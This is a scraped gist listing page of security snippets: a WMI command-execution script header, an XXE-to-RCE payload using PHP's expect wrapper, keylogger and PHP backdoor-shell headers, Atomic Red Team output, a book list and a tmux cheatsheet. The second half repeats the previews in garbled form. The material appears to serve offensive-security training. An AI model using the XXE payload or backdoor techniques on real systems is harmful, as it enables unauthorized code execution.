mosesrenegade mosesrenegade

## autoProc.py
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages

## XXE RCE Expect PHP
What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE.

https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7

```
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
<entry>

## booklist.txt
.NET and COM: The Complete Interoperability Guide
@War: The Rise of the Military-Internet Complex
21st Century C: C Tips from the New School
3D Math Primer for Graphics and Game Development (Wordware Game Math Library)
A Guide to Claims-Based Identity and Access Control (Microsoft patterns & practices)
A Guide to Kernel Exploitation: Attacking the Core
A More Beautiful Question: The Power of Inquiry to Spark Breakthrough Ideas
A Primer of Analytic Number Theory: From Pythagoras to Riemann
Absolute FreeBSD, 2nd Edition: The Complete Guide to FreeBSD
Advanced C and C++ Compiling

## AtomicTestsCommandLines.txt

     _  _____ ___  __  __ ___ ____   ____  _____ ____    _____ _____    _    __  __
    / \|_   _/ _ \|  \/  |_ _/ ___| |  _ \| ____|  _ \  |_   _| ____|  / \  |  \/  |
   / _ \ | || | | | |\/| || | |     | |_) |  _| | | | |   | | |  _|   / _ \ | |\/| |
  / ___ \| || |_| | |  | || | |___  |  _ <| |___| |_| |   | | | |___ / ___ \| |  | |
 /_/   \_\_| \___/|_|  |_|___\____| |_| \_\_____|____/    |_| |_____/_/   \_\_|  |_|


[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)

## RC4-no-swap.py
#!/usr/bin/env python

debug = 0

def KSA(key):
    keylength = len(key)

    if debug == 1:
        print("Current Keylength is " + str(keylength))

## main.cpp
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include <iostream>
#include <string>
#include <vector>

#include "pe_sieve_api.h"
#pragma comment(lib, "pe-sieve.lib")

## InstallUtilMouseKeyLogger.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
 * https://code.google.com/p/klog-sharp/
*/

## deployment-tool-ansible-puppet-chef-salt.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mosesrenegade
                / deployment-tool-ansible-puppet-chef-salt.md
            
            
              Created
              February 7, 2018 00:15
                — forked from jaceklaskowski/deployment-tool-ansible-puppet-chef-salt.md
            
              
                Choosing a deployment tool - ansible vs puppet vs chef vs salt
              
          
    Requirements


no upfront installation/agents on remote/slave machines - ssh should be enough
application components should use third-party software, e.g. HDFS, Spark's cluster, deployed separately
configuration templating
environment requires/asserts, i.e. we need a JVM in a given version before doing deployment
deployment process run from Jenkins

Solution


## tmux-cheatsheet.markdown

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mosesrenegade
                / tmux-cheatsheet.markdown
            
            
              Created
              February 5, 2018 00:41
                — forked from MohamedAlaa/tmux-cheatsheet.markdown
            
              
                tmux shortcuts & cheatsheet
              
          
    tmux shortcuts & cheatsheet

start new:
tmux

start new with session name:
tmux new -s myname


## php-shell-542.txt
In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'.

Write to a webhost:
nano /var/www/html/id.txt

Inside of id.txt we have some helper functions to debug:

<?php
echo "<pre>";
echo "This is the symbol table:";
	#!/usr/bin/env python
	# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# A similar approach to smbexec but executing commands through WMI.
	# Main advantage here is it runs under the user (has to be Admin)
	# account, not SYSTEM, plus, it doesn't generate noisy messages
	What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE.

	https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7

	```
	<?xml version="1.0"?>
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
	<entry>
	.NET and COM: The Complete Interoperability Guide
	@War: The Rise of the Military-Internet Complex
	21st Century C: C Tips from the New School
	3D Math Primer for Graphics and Game Development (Wordware Game Math Library)
	A Guide to Claims-Based Identity and Access Control (Microsoft patterns & practices)
	A Guide to Kernel Exploitation: Attacking the Core
	A More Beautiful Question: The Power of Inquiry to Spark Breakthrough Ideas
	A Primer of Analytic Number Theory: From Pythagoras to Riemann
	Absolute FreeBSD, 2nd Edition: The Complete Guide to FreeBSD
	Advanced C and C++ Compiling

	_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
	/ \\|_ _/ _ \\| \/ \|_ _/ ___\| \| _ \\| ____\| _ \ \|_ _\| ____\| / \ \| \/ \|
	/ _ \ \| \|\| \| \| \| \|\/\| \|\| \| \| \| \|_) \| _\| \| \| \| \| \| \| \| _\| / _ \ \| \|\/\| \|
	/ ___ \\| \|\| \|_\| \| \| \| \|\| \| \|___ \| _ <\| \|___\| \|_\| \| \| \| \| \|___ / ___ \\| \| \| \|
	/_/ \_\_\| \___/\|_\| \|_\|___\____\| \|_\| \_\_____\|____/ \|_\| \|_____/_/ \_\_\| \|_\|



	[******BEGIN TEST*****] Data Compressed T1002 has 3 Test(s)
	#!/usr/bin/env python

	debug = 0

	def KSA(key):
	keylength = len(key)

	if debug == 1:
	print("Current Keylength is " + str(keylength))
	#include <stdio.h>
	#include <windows.h>
	#include <psapi.h>
	#include <iostream>
	#include <string>
	#include <vector>

	#include "pe_sieve_api.h"
	#pragma comment(lib, "pe-sieve.lib")
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	//KeyStroke Mouse Clicks Code
	/*
	* https://code.google.com/p/klog-sharp/
	*/
	In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'.

	Write to a webhost:
	nano /var/www/html/id.txt

	Inside of id.txt we have some helper functions to debug:

	<?php
	echo "<pre>";
	echo "This is the symbol table:";